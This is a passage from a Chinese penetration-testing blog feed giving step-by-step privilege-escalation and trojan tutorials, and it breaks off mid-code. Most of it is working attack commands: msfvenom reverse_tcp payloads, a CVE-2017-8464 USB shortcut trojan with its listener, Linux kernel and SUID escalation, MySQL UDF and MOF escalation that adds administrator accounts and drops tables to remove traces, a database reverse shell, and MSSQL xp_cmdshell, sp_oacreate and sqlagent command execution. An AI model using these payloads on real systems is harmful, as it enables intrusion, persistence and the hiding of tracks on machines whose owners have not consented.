class="hljs-keyword">Set</span> vbs=<span class="hljs-built_in">CreateObject</span>(<span class="hljs-string">"Wscript.Shell"</span>)<br>vbs.run <span class="hljs-string">"cmd /c 要执行的命令"</span>,<span class="hljs-number">0</span><br></script><br></code></pre></td></tr></table></figure><p>When the server administrator downloads a file with Thunder, the command in the VBScript runs and the privilege escalation is complete.</p><h2 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux privilege escalation"></a>Linux privilege escalation</h2><p>Compared with Windows, Linux privilege-escalation methods are fairly uniform: the main ones are SUID, kernel, environment-variable, scheduled-task and third-party-service escalation. Today I will note down SUID and kernel escalation, together with information gathering and vulnerability probing on the target Linux host.</p><h3 id="内核提权"><a href="#内核提权" class="headerlink" title="Kernel privilege escalation"></a>Kernel privilege escalation</h3><p>Before kernel privilege escalation on Linux, we usually check the kernel version first:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">uname</span> -a<br>lsb_release -a<br></code></pre></td></tr></table></figure><p>After finding the matching exploit for the kernel version, get a reverse shell from the webshell:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvvp 监听端口<br>python -c <span class="hljs-string">"import pty;pty.spawn('/bin/bash')"</span> <span class="hljs-comment">#if the shell looks ugly, this command turns it into an interactive terminal</span><br></code></pre></td></tr></table></figure><p>Compile on the Linux system and make it executable:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">gcc exp.c -o exp<br><span class="hljs-built_in">chmod</span> +x exp<br></code></pre></td></tr></table></figure><p>Run the exploit:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./exp<br></code></pre></td></tr></table></figure><p>Verify whether the escalation succeeded:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">whoami</span><br></code></pre></td></tr></table></figure><p>If the result is root, the escalation succeeded. This holds for every Linux distribution.</p><p>Manual information gathering is inefficient, though, so here are two recommended automated scripts for enumeration and vulnerability probing:<br>Enumeration: LinEnum.sh<br>Vulnerability probing: linux-exploit-suggester-2</p><h3 id="suid提权"><a href="#suid提权" class="headerlink" title="SUID privilege escalation"></a>SUID privilege escalation</h3><p>First, the concepts of SUID and SGID. With SUID, when a file that has the SUID bit is executed, it runs with the same privileges as the user who set that bit: if root sets SUID on file a, then when we run a as the ordinary user user, the file still runs with root privileges. SGID is the same idea, with the owning group taking the place of the owning user.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># Manually set the SUID bit:</span><br><span class="hljs-built_in">chmod</span> u+s xxx<br><span class="hljs-comment"># Manually remove the SUID bit:</span><br><span class="hljs-built_in">chmod</span> u-s xxx<br><span class="hljs-comment"># Manually search for SUID binaries on this host:</span><br>find / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2>/dev/null<br>find / -perm -u=s -<span class="hljs-built_in">type</span> f 2>/dev/null<br>find / -user root -perm -4000 -<span class="hljs-built_in">exec</span> <span class="hljs-built_in">ls</span> -ldb {} \;<br><span class="hljs-comment"># Search for SGID binaries:</span><br>find / -perm -g=s -<span class="hljs-built_in">type</span> f 2>/dev/null<br><br><span class="hljs-comment"># SUID privilege escalation means using a binary that has the SUID bit to run other commands; because the SUID binary runs with root privileges, this breaks out of ordinary privileges and runs commands as root</span><br><span class="hljs-comment"># Some common SUID binaries that can be used for privilege escalation</span><br>nmap<br>vim<br>less<br>more<br>nano<br><span class="hljs-built_in">cp</span><br><span class="hljs-built_in">mv</span><br>find<br><span class="hljs-comment"># and so on</span><br></code></pre></td></tr></table></figure><p>SUID binary lookup site: <a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p><h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>1. Some escalation methods only apply in particular environments; there are, of course, also universal ones<br>2. Methods also differ by operating-system version; the features present determine the attack surface<br>3. Some methods need a specific environment, such as a database or third-party software</p><p>There are many more clever escalation tricks, such as middleware vulnerability escalation and token theft; space is limited, so I won't expand on them here.</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Privilege Escalation</tag>
</tags>
</entry>
<entry>
<title>Kali Penetration (2): Bringing a Linux Host Online and Making a USB Trojan</title>
<link href="/2021/10/28/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-Linux%E4%B8%BB%E6%9C%BA%E4%B8%8A%E7%BA%BF%E5%92%8CU%E7%9B%98%E9%A9%AC%E5%88%B6%E4%BD%9C/"/>
<url>/2021/10/28/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-Linux%E4%B8%BB%E6%9C%BA%E4%B8%8A%E7%BA%BF%E5%92%8CU%E7%9B%98%E9%A9%AC%E5%88%B6%E4%BD%9C/</url>
<content type="html"><![CDATA[<h2 id="Linux主机上线"><a href="#Linux主机上线" class="headerlink" title="Bringing a Linux host online"></a>Bringing a Linux host online</h2><p><strong>Generate a Linux trojan with msf and listen for it</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfconsole<br>msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=域名或ip lport=端口 sessioncommunicationtimeout=0 sessionexpirationtimeout=0 -f elf>文件名.elf<br>use exploit/multi/handler<br><span class="hljs-built_in">set</span> payload linux/x64/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> lhost 域名或ip<br><span class="hljs-built_in">set</span> lport 端口<br>exploit<br></code></pre></td></tr></table></figure><p>ELF (Executable and Linkable Format) is the executable file format of Linux; my understanding is that it corresponds to the exe executable on Windows.</p><p>Compared with before, we can see that two extra options beginning with session have been added; they mean, respectively, that the session will not be destroyed and that the session has the highest priority.</p><h2 id="U盘马制作"><a href="#U盘马制作" class="headerlink" title="Making a USB trojan"></a>Making a USB trojan</h2><p><strong>What is close-access penetration?</strong></p><p>Close-access penetration testing is a new security-assessment approach that has gradually emerged in the field of cyberspace security.</p><p>It is a high-grade network-security assessment operation that combines conventional network attack and defence, physical proximity, social engineering, and radio-communication attack and defence. After signing a penetration-testing authorization agreement, the assessment team physically enters the company's office area by means of disguise, social engineering and the like, <strong>obtains "results" through the various potential internal attack surfaces (such as Wi-Fi networks, RFID door access, exposed wired network ports and USB ports), and finally carries the assessment results out covertly for reporting, thereby proving that the company's security defences have gaps.</strong></p><p>Here we bring the target machine online with a USB trojan, which is in fact also a form of close-access penetration.</p><p><strong>Generate the USB trojan with msf</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfconsole<br>use exploit/windows/fileformat/cve_2017_8464_lnk_rce<br><span class="hljs-built_in">set</span> payload windows/x64/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> lhost 域名或ip<br><span class="hljs-built_in">set</span> lport 端口<br>exploit<br></code></pre></td></tr></table></figure><p>After running this, a large number of shortcuts are generated and saved in a hidden folder; make the folder visible and enter the local directory inside it. Copy all the shortcuts in that directory to a prepared USB drive, plug the drive into the target machine, and the target comes online. Don't forget to set up the listener:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfconsole<br>use exploit/multi/handler<br><span class="hljs-built_in">set</span> payload windows/x64/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> LHOST 域名或ip<br><span class="hljs-built_in">set</span> LPORT 端口<br>exploit<br></code></pre></td></tr></table></figure><p>Of course, you can also use a BadUSB development board, provided you use Arduino and write the code yourself. I have tried both Digispark and Leonardo boards; running commands via PowerShell was blocked by Huorong (火绒) antivirus every time. If anyone has a solution, please leave a comment!</p>]]></content>
<categories>
<category>Wireless Security</category>
</categories>
<tags>
<tag>Kali Penetration</tag>
</tags>
</entry>
<entry>
<title>Database Privilege Escalation</title>
<link href="/2021/10/27/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/"/>
<url>/2021/10/27/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/</url>
<content type="html"><![CDATA[<h1 id="MySQL数据库提权"><a href="#MySQL数据库提权" class="headerlink" title="MySQL privilege escalation"></a>MySQL privilege escalation</h1><h2 id="提权方式"><a href="#提权方式" class="headerlink" title="Escalation methods"></a>Escalation methods</h2><ul><li>UDF privilege escalation</li><li>MOF privilege escalation</li><li>Startup-item privilege escalation</li><li>Reverse-shell privilege escalation</li></ul><h2 id="udf提权"><a href="#udf提权" class="headerlink" title="UDF privilege escalation"></a>UDF privilege escalation</h2><p>User Defined Functions, UDF for short, are simply functions that users can define themselves. UDF privilege escalation creates a custom function (sys_eval) and calls that custom function (sys_eval) from MySQL to obtain a shell with SYSTEM privileges on the target host, thereby escalating privileges. Put simply, place the escalation library in the directory MySQL expects, create the custom function from it with SQL, and call the function to obtain shell privileges. We need to put udf.dll into C:\phpStudy\MySQL\lib\plugin; the leading part of the path may differ from mine, but what matters is that the DLL ends up in the \lib\plugin directory.</p><p>MySQL versions above 5.1: udf.dll must be placed in the lib\plugin folder under the MySQL install directory. MySQL versions below 5.1: on Windows 2003 place udf.dll in c:\windows\system32, on Windows 2000 in c:\winnt\system32. If the directory does not exist, create it using NTFS data streams:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> <span class="hljs-string">'It is dll'</span> <span class="hljs-keyword">into</span> dumpfile <span class="hljs-string">'C:\\phpStudy\\MySQL\\lib::$INDEX_ALLOCATION'</span>; #create the lib directory via NTFS ADS <br><span class="hljs-keyword">select</span> <span class="hljs-string">'It is dll'</span> <span class="hljs-keyword">into</span> dumpfile <span class="hljs-string">'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'</span>; #create the plugin directory via NTFS ADS<br></code></pre></td></tr></table></figure><h3 id="提权条件"><a href="#提权条件" class="headerlink" title="Prerequisites"></a>Prerequisites</h3><p>1) A shell on the target's MySQL, or MySQL credentials that allow SQL statements to be run</p><p>2) The MySQL account has INSERT and DELETE privileges, i.e. it can write and delete, create directories and write files</p><p>3) The target's MySQL runs with root privileges</p><p>Check whether writing is possible: <code>show global variables like 'secure%';</code></p><p>secure_file_priv restricts the directory in which functions may upload or read files. If secure_file_priv is empty, writing is allowed; if it is set to a specific path, only that path is writable; to make everything writable, add the setting to the mysql.ini configuration file.</p><h3 id="操作过程"><a href="#操作过程" class="headerlink" title="Procedure"></a>Procedure</h3><p>1. Get the plugin directory: <code>show variables like "%plugin%";</code></p><p>2. Find the UDF library for the target's operating system: on Windows upload it directly; on Linux sqlmap ships one. For Linux, first check the architecture with <code>uname -a</code>, then look in the shared-library path <code>/pentest/database/sqlmap/udf/mysql/linux/64</code> (assuming a 64-bit system); the file is lib_mysqludf_sys.so</p><p>3. Place the file:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">create</span> <span class="hljs-keyword">table</span> temp(data longblob); #create a temporary table with a longblob column to hold the binary data<br><span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> temp(data) <span class="hljs-keyword">values</span> (unhex(<span class="hljs-string">'udf文件的16进制格式'</span>)); #write the hex of udf.dll into the table<br><span class="hljs-keyword">select</span> data <span class="hljs-keyword">from</span> temp <span class="hljs-keyword">into</span> dumpfile "xxx\\xxx\\lib\\plugin\\udf.dll"; #dump the udf file into the target directory<br><span class="hljs-keyword">create</span> <span class="hljs-keyword">function</span> sys_eval <span class="hljs-keyword">returns</span> string soname <span class="hljs-string">'udf.dll'</span>; #create the custom function sys_eval<br></code></pre></td></tr></table></figure><p>Note that on Linux you may need to grant read/write permissions: <code>chmod 777 /usr/lib/mysql/plugin</code></p><p>List the functions supported by the UDF library (Linux): <code>nm -D /usr/lib/mysql/plugin/mysqludf.so</code></p><p>4. Verify that the escalation worked: <code>select sys_eval('命令')</code></p><h3 id="提权常用SQL语句"><a href="#提权常用SQL语句" class="headerlink" title="Common SQL statements for escalation"></a>Common SQL statements for escalation</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> cmdshell(<span class="hljs-string">'net user hsy 123456 /add'</span>); #add a user<br><span class="hljs-keyword">select</span> cmdshell(<span class="hljs-string">'net localgroup administrators hsy /add'</span>); #add the user to the administrators group<br><span class="hljs-keyword">drop</span> <span class="hljs-keyword">function</span> sys_eval; #drop the function<br><span class="hljs-keyword">DROP</span> <span class="hljs-keyword">TABLE</span> temp; #drop the temp table created earlier to remove traces<br></code></pre></td></tr></table></figure><h2 id="mof提权"><a href="#mof提权" class="headerlink" title="MOF privilege escalation"></a>MOF privilege escalation</h2><p>This uses the <code>nullevt.mof</code> file in the <code>C:\Windows\System32\wbem\MOF</code> directory.</p><p>It exploits the fact that this file is executed once every minute: write a cmd command into the file and it will be run.</p><h3 id="提权条件-1"><a href="#提权条件-1" class="headerlink" title="Prerequisites"></a>Prerequisites</h3><ol><li>Windows only, and generally only older versions such as <code>xp</code> and <code>server2003</code>.</li><li>Read and write permission on the <code>C:\Windows\System32\wbem\MOF</code> directory.</li><li>A writable directory into which the mof file can be written.</li></ol><h3 id="操作过程-1"><a href="#操作过程-1" class="headerlink" title="Procedure"></a>Procedure</h3><ol><li>Upload the mof file to a writable directory, for example <code>C:/wmpub/nullevt.mof</code>.</li><li>Copy the file to <code>C:/Windows/System32/wbem/MOF/nullevt.mof</code>:</li></ol><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> load_file(<span class="hljs-string">'C:/wmpub/nullevt.mof'</span>) <span class="hljs-keyword">into</span> dumpfile <span class="hljs-string">'C:/Windows/System32/wbem/MOF/nullevt.mof'</span><br></code></pre></td></tr></table></figure><p>3. Copy the following code into the file with the .mof extension:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs sql"># pragma namespace("\.\root\subscription")<br><br>instance <span class="hljs-keyword">of</span> EventFilter <span class="hljs-keyword">as</span> $EventFilter{ EventNamespace <span class="hljs-operator">=</span>"Root\Cimv2"; Name <span class="hljs-operator">=</span> "filtP2"; Query <span class="hljs-operator">=</span> "Select * From InstanceModificationEvent "<br><br>"Where TargetInstance Isa \"Win32_LocalTime\" "<br><br>"And TargetInstance.Second = 5";<br><br>QueryLanguage <span class="hljs-operator">=</span> "WQL";<br><br>};<br><br>instance <span class="hljs-keyword">of</span> ActiveScriptEventConsumer <span class="hljs-keyword">as</span> $Consumer<br><br>{<br><br>Name <span class="hljs-operator">=</span> "consPCSV2";<br><br>ScriptingEngine <span class="hljs-operator">=</span> "JScript";<br><br>ScriptText <span class="hljs-operator">=</span><br><br>"var WSH = new<br><br>ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe <span class="hljs-keyword">user</span> admin admin 
<span class="hljs-operator">/</span><span class="hljs-keyword">add</span>")";<br><br>};<br><br>instance <span class="hljs-keyword">of</span> __FilterToConsumerBinding<br><br>{<br><br>Consumer <span class="hljs-operator">=</span> $Consumer;<br><br><span class="hljs-keyword">Filter</span> <span class="hljs-operator">=</span> $EventFilter;<br><br>};<br></code></pre></td></tr></table></figure><p>把这个mof文件上传到目标机中,可以修改代码,进行命令执行。</p><p>目前mof提权方法用的比较少,建议使用udf脚本进行MySQL数据库提权。</p><h2 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h2><p>利用MySQL,将后门写入开机启动项。同时因为是开机自启动,在写入之后,需要重启目标服务器,才可以运行。</p><h2 id="反弹shell提权"><a href="#反弹shell提权" class="headerlink" title="反弹shell提权"></a>反弹shell提权</h2><p>mysql创建反弹函数:<code>select backshell(’发送到的ip地址’,’端口’)</code>,kali使用nc监听本地(攻击机)IP:<code>nc -l(本地)-p 端口</code>。</p><h1 id="SQL-Server和Oracle数据库提权"><a href="#SQL-Server和Oracle数据库提权" class="headerlink" title="SQL Server和Oracle数据库提权"></a>SQL Server和Oracle数据库提权</h1><h2 id="SQL-server数据库提权"><a href="#SQL-server数据库提权" class="headerlink" title="SQL server数据库提权"></a>SQL server数据库提权</h2><ul><li>xp_cmd_shell提权(数据库权限要求是最高的SA权限)</li><li>sp_oacreate提权</li><li>沙盒提权</li><li>sqlagent.exe提权(数据库权限不要求最高)</li></ul><h2 id="xp-cmd-shell提权"><a href="#xp-cmd-shell提权" class="headerlink" title="xp_cmd_shell提权"></a>xp_cmd_shell提权</h2><p>mssql2000中默认开启xp_cmd_shell,2005以后默认禁用。</p><p>管理员 sysadmin(即sa)权限则可以用 sp_configure 重新开启它。</p><p>启用:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">EXEC</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span><br>RECONFIGURE;<br><span class="hljs-built_in">EXEC</span> sp_configure ‘xp_cmdshell’, <span 
class="hljs-number">1</span>;<br>RECONFIGURE;<br></code></pre></td></tr></table></figure><p>关闭:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">exec</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span>;<br>reconfigure;<br><span class="hljs-built_in">exec</span> sp_configure ‘xp_cmdshell’, <span class="hljs-number">0</span>;<br>reconfigure;<br></code></pre></td></tr></table></figure><p>执行:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">EXEC master<span class="hljs-selector-class">.dbo</span><span class="hljs-selector-class">.xp_cmdshell</span> ‘命令’<br></code></pre></td></tr></table></figure><p>如果 xp_cmdshell 被删除了,可以上传 xplog70.dll 进行恢复<br><code>exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll’</code></p><h2 id="sp-oacreate提权"><a href="#sp-oacreate提权" class="headerlink" title="sp_oacreate提权"></a>sp_oacreate提权</h2><p>主要是用来调用 OLE 对象,利用 OLE 对象的 run 方法执行系统命令。</p><p>启用:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">EXEC</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br><span class="hljs-keyword">EXEC</span> sp_configure ‘Ole Automation Procedures’, <span class="hljs-number">1</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> 
OVERRIDE;<br></code></pre></td></tr></table></figure><p>关闭:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">EXEC</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced options’, <span class="hljs-number">1</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br><span class="hljs-keyword">EXEC</span> sp_configure ‘Ole Automation Procedures’, <span class="hljs-number">0</span>;<br>RECONFIGURE <span class="hljs-keyword">WITH</span> OVERRIDE;<br></code></pre></td></tr></table></figure><p>执行:</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm"><span class="hljs-keyword">declare</span> <span class="hljs-title">@shell</span> int exec sp_oacreate ‘wscript.shell’<span class="hljs-punctuation">,</span><span class="hljs-title">@shell</span> output exec sp_oamethod<br><span class="hljs-title">@shell</span><span class="hljs-punctuation">,</span>’run’<span class="hljs-punctuation">,</span><span class="hljs-keyword">null</span><span class="hljs-punctuation">,</span>’<span class="hljs-keyword">c</span>:\windows\system<span class="hljs-number">32</span>\cmd.exe /<span class="hljs-keyword">c</span> whoami ><span class="hljs-keyword">c</span>:\<span class="hljs-number">1</span>.txt’<br></code></pre></td></tr></table></figure><h2 id="沙盒提权"><a href="#沙盒提权" class="headerlink" title="沙盒提权"></a>沙盒提权</h2><p>mssql自带沙盒,利用沙盒执行命令。<br>开启沙盒,使用沙盒执行命令:</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">exec</span> sp_configure ‘<span class="hljs-keyword">show</span> advanced 
options’,<span class="hljs-number">1</span>;reconfigure; <span class="hljs-meta">#不开启的话在执行xp_regwrite 会提示让我们开启</span><br></code></pre></td></tr></table></figure><p>关闭沙盒:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure; <span class="hljs-comment">#如果一次执行全部代码有问题,先执行这句和上一句代码</span><br></code></pre></td></tr></table></figure><p>查询是否正常关闭:</p><figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><span class="hljs-keyword">exec</span> master..xp_regwrite<br>‘<span class="hljs-params">HKEY_LOCAL_MACHINE</span>’,’SOFTWARE\Microsoft\Jet\<span class="hljs-number">4.0</span>\Engines’,’SandBoxMode’,’REG_DWORD’,<span class="hljs-number">0</span><span class="hljs-comment">;</span><br><span class="hljs-comment">#经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句</span><br></code></pre></td></tr></table></figure><p>执行系统命令:</p><figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><span class="hljs-keyword">exec</span> master.dbo.xp_regread ‘<span class="hljs-params">HKEY_LOCAL_MACHINE</span>’,’SOFTWARE\Microsoft\Jet\<span class="hljs-number">4.0</span>\Engines’,<br>‘SandBoxMode’<br></code></pre></td></tr></table></figure><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> openrowset(<span class="hljs-string">'microsoft.jet.oledb.4.0'</span>,<span 
class="hljs-string">';database=c:/windows/system32/ias/ias.mdb'</span>,<span class="hljs-string">'select shell("net user qianxun 123456 /add")'</span>)<br><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> openrowset(<span class="hljs-string">'microsoft.jet.oledb.4.0'</span>,<span class="hljs-string">';database=c:/windows/system32/ias/ias.mdb'</span>,<span class="hljs-string">'select shell("net localgroup administrators qianxun /add")'</span>)<br></code></pre></td></tr></table></figure><p>恢复配置:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> master..xp_regwrite <span class="hljs-string">'HKEY_LOCALMACHINE'</span>,<span class="hljs-string">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span>,<span class="hljs-string">'SandBoxMode'</span>,<span class="hljs-string">'REG_DWORD'</span>,1;<br><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">'Ad Hoc Distributed Queries'</span>,0;reconfigure;<br><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">'show advanced options'</span>,0;reconfigure;<br></code></pre></td></tr></table></figure><p><strong>沙盒模式SandBoxMode参数含义(默认是2)</strong></p><p>0:在任何所有者中禁止启用安全模式</p><p>1 :为仅在允许范围内</p><p>2 :必须在access模式下</p><p>3:完全开启</p><h2 id="sqlagent-exe提权"><a href="#sqlagent-exe提权" class="headerlink" title="sqlagent.exe提权"></a>sqlagent.exe提权</h2><p>sqlagent.exe是微软Microsoft SQL Server精灵程序,用于计划任务。当服务器出现故障时,该程序可帮助恢复服务器上的数据,不过只有mssql才有这个程序。</p><p>拿到webshell以后,我们先执行<code>tasklist /svc</code>命令,查看是否有sqlagent.exe进程在运行。如果有的话,直接用普通用户连接数据库,并执行以下SQL语句:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs sql">USE msdb<br><span class="hljs-keyword">EXEC</span> sp_add_job <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span>,<br><span class="hljs-variable">@enabled</span> <span class="hljs-operator">=</span> <span class="hljs-number">1</span>,<br><span class="hljs-variable">@description</span> <span class="hljs-operator">=</span> <span class="hljs-string">'This will give a low privileged user access to xp_cmdshell'</span>,<br><span class="hljs-variable">@delete</span>_level <span class="hljs-operator">=</span> <span class="hljs-number">1</span><br><span class="hljs-keyword">EXEC</span> sp_add_jobstep <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span>,<br><span class="hljs-variable">@step</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'Exec my sql'</span>,<br><span class="hljs-variable">@subsystem</span> <span class="hljs-operator">=</span> <span class="hljs-string">'TSQL'</span>,<br><span class="hljs-variable">@command</span> <span class="hljs-operator">=</span> <span class="hljs-string">'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "要执行的命令> c:\inetpub\wwwroot\results.txt"'''''',N''Master'''</span> <br><span class="hljs-keyword">EXEC</span> sp_add_jobserver <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span>, #命令执行结果输出在 c:\inetpub\wwwroot\results.txt,路径可改<br><span class="hljs-variable">@server</span>_name <span class="hljs-operator">=</span> <span 
